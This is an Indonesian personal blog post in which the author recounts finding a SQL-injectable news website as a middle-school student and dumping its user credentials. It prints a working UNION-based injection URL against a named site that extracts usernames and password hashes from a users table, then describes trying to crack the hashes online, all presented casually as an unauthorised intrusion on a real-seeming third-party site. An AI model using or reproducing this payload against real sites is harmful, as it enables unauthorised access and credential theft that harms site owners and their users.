SQL Injection [In Action]
Hai, kemaren saya sudah membahas tentang XSS, sekarang SQL Injection (selanjutnya disingkat SQLi)
Saya tidak akan berpanjang lebar lagi tentang gimana caranya melakukan SQLi karena sudah banyak tutornya. Tapi saya akan langsung praktek (hoho :P)
1. Waktu saya kelas 8 SMP, saya menemukan sebuah website yang vuln SQLi
2. Dan setelah saya inject sana-sini (bukan injek ya :P), saya berhasil dapet passwordnya dengan exploit ini:
[xpl]
http://www.jmtv.com/news.php?id=-1+union+select+1,group_concat(username,0x3a,password,0x3a),3+from+users--
[/xpl]
Agak panjang hashnya :P
3. Karena hashnya panjang dan ketika saya crack di hashkiller juga gak nemu hasil, inilah seni dibalik gagal nemu hashnya :P
Setidaknya pernah disentuh :D
Segini dulu deh tulisan dari saya, memang bukan teknik dasar, cuma share pengalaman, mungkin kalian juga punya pengalaman yang serupa kaya saya.
Dadah ^_^
0 Tanggapan:
Post a Comment